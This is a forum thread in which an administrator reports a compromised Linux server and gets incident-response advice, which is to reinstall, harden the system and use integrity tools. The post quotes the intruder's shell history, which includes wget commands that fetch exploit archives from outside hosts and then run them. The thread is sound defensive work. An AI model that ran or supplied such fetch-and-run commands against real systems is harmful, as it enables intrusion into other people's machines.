Dear All,

Please help. I am a newbie at this and I believe my server has been compromised.

Thus far, only I have access to this server and it has been online for about a month now. There are very few users in /home and I use them all myself. There was this one user which I had not logged into for a while and then when I tried to login, suddenly found that I couldn't. Didn't suspect a thing until about a week or 2 later.

This is what I have found out so far. I hope someone is able to help me figure out what has been done to my box.

Here is the user's .bash_history

w
exit
w
cd /tmp
ls
wget
wget
wget LoveIulia.home.ro/7350wurmxpl.tgz
wget 65.113.119.149/fanelove/ana/7350wurmxpl.tgz
wget ps-lov.us/local.tgz
wget ps-lov.us/local.tgz
killall -9 -vq wget
wget vampix.go.ro/brk
ftp -v BuGsJr.dap.ro
dap.ro
ftp -v dap.ro
bye
killall -9 -vq ftp
ftp -v dap.ro
ftp -v BuGsJr.dap.ro
ls
killall -9 -vq ftp
tar xzvf 7350wurmxpl.tgz
./7350
w
cd "/ /"
clear
cd /tmp
ls
./7350
w
cd "// "
cd /tmp
clear
ls
wget paradis.home.ro/partys
killall -9 -vq wget
killall -9 -vq wget
clear
ls -a
free
cat /proc/cpuinfo
wget LoveIulia.home.ro/p.tar.gz
clearls
ps ax
killall -9 -vq ftp
killall -9 -vq wget
clearlsclear
;ls
clear
ls
./7350
w
cd "// "
clear
ls
w
cd /etc/nmh/...
clear
ls
cd /tmp
ls
./7350
w
cd /tmp
ls
w
cd "// "
clear
cd /tmp
ls
w
./7350
passwd
passwd
exit
passwd


----------------------------------

I'm not sure if he modified his .bash_history but this is all I have above.

----------------------------------

Then I went into /etc/nmh/ and found this when I did an "ls -al" -


-rw-r--r-- 1 root root 26 Jun 25 2001 components
-rw-r--r-- 1 root root 275 Jun 25 2001 digestcomps
-rw-r--r-- 1 root root 22 Jun 25 2001 distcomps
-rw-r--r-- 1 root root 26 Jun 25 2001 forwcomps
-rw-r--r-- 1 root root 1153 Jun 25 2001 MailAliases
-rw-r--r-- 1 root root 46 Jun 25 2001 mhl.body
-rw-r--r-- 1 root root 193 Jun 25 2001 mhl.digest
-rw-r--r-- 1 root root 379 Jun 25 2001 mhl.format
-rw-r--r-- 1 root root 284 Jun 25 2001 mhl.forward
-rw-r--r-- 1 root root 415 Jun 25 2001 mhl.headers
-rw-r--r-- 1 root root 122 Jun 25 2001 mhl.reply
-rw-r--r-- 1 root root 856 Jun 25 2001 mhn.defaults
-rw-r--r-- 1 root root 984 Jun 25 2001 mts.conf
-rw-r--r-- 1 root root 84 Jun 25 2001 rcvdistcomps
-rw-r--r-- 1 root root 104 Jun 25 2001 rcvdistcomps.outbox
-rw-r--r-- 1 root root 756 Jun 25 2001 replcomps
-rw-r--r-- 1 root root 965 Jun 25 2001 replgroupcomps
-rw-r--r-- 1 root root 455 Jun 25 2001 scan.default
-rw-r--r-- 1 root root 273 Jun 25 2001 scan.mailx
-rw-r--r-- 1 root root 450 Jun 25 2001 scan.MMDDYY
-rw-r--r-- 1 root root 378 Jun 25 2001 scan.nomime
-rw-r--r-- 1 root root 245 Jun 25 2001 scan.size
-rw-r--r-- 1 root root 284 Jun 25 2001 scan.time
-rw-r--r-- 1 root root 404 Jun 25 2001 scan.timely
-rw-r--r-- 1 root root 252 Jun 25 2001 scan.unseen
-rw-r--r-- 1 root root 473 Jun 25 2001 scan.YYYYMMDD

I "cat" some of the files and I believe it's some spammer's tool or something.

---------------------------------------

I have changed the password for the compromised user and disabled login. However, I do now know what he/she has done to my server. Could someone please help me figure what to do next as I am at a loss of what to do.

Thank you.

Oops, I realiased that /etc/nmh/ directory is available in my other RHL system.

I did a "last" command and saw this too. Prob. not much help but any help would be greatly appreciated.

xxxuser pts/0 s-skynet8.ts.ter Mon Aug 9 19:44 - crash (11:27)
xxxuser pts/0 s-skynet10.ts.te Tue Aug 3 19:59 - 20:03 (00:04)
xxxuser pts/1 s-skynet10.ts.te Tue Aug 3 19:56 - crash (6+11:15)

Does that tell us anything?

Well, '.ro' is Romania, wurmxpl leads to a latvian site (.lv), and the ps-lov.us is a Linux virus, see : http://seclists.org/lists/fulldisclo.../Oct/0341.html
Basically, I'd recommend re-installing from a known good backup ie go as far back as necessary and then make sure you have a good firewall etc setup.
Test against your machine using nmap (www.insecure.org), nessus (www.nessus.org) and consider using Tripwire (www.tripwire.org), and the hardening script(s) from www.bastille-linux.org.
It's just too risky to try and cleanup...

Hi chrism01, thanks for the quick response. As I do more detective work, I just found out that the server was compromised on Aug 3 and my firewall was only up on Aug 13.

With the backdoor that comes with the ps-lov.us virus, do you think they still have a backdoor to the server since the firewall has been up?

Thanks again.

That's only the stuff we know about... there could be any number of other things done to you eg replacing ps with a trojan version. I'm afraid I can only recommend a complete re-install. There's no other way to be sure your system is clean
You may want to read the Security References thread for recommendations / howtos on how to secure your system.

Hi Chris,

Thanks for the reply. Yeah, I guess I was still a lil' hopeful last nite, when I had just discovered the breach. Now, I've come to my senses and what you say is right, a complete re-install wld be best as we don't really know what other system files they cld have modified.

Thanks for the pointer on the Security References thread. I think I'll need to plough through it before I put my server online again. Good thing it was in production stage yet.

Thanks again.

Cheers,
Andrew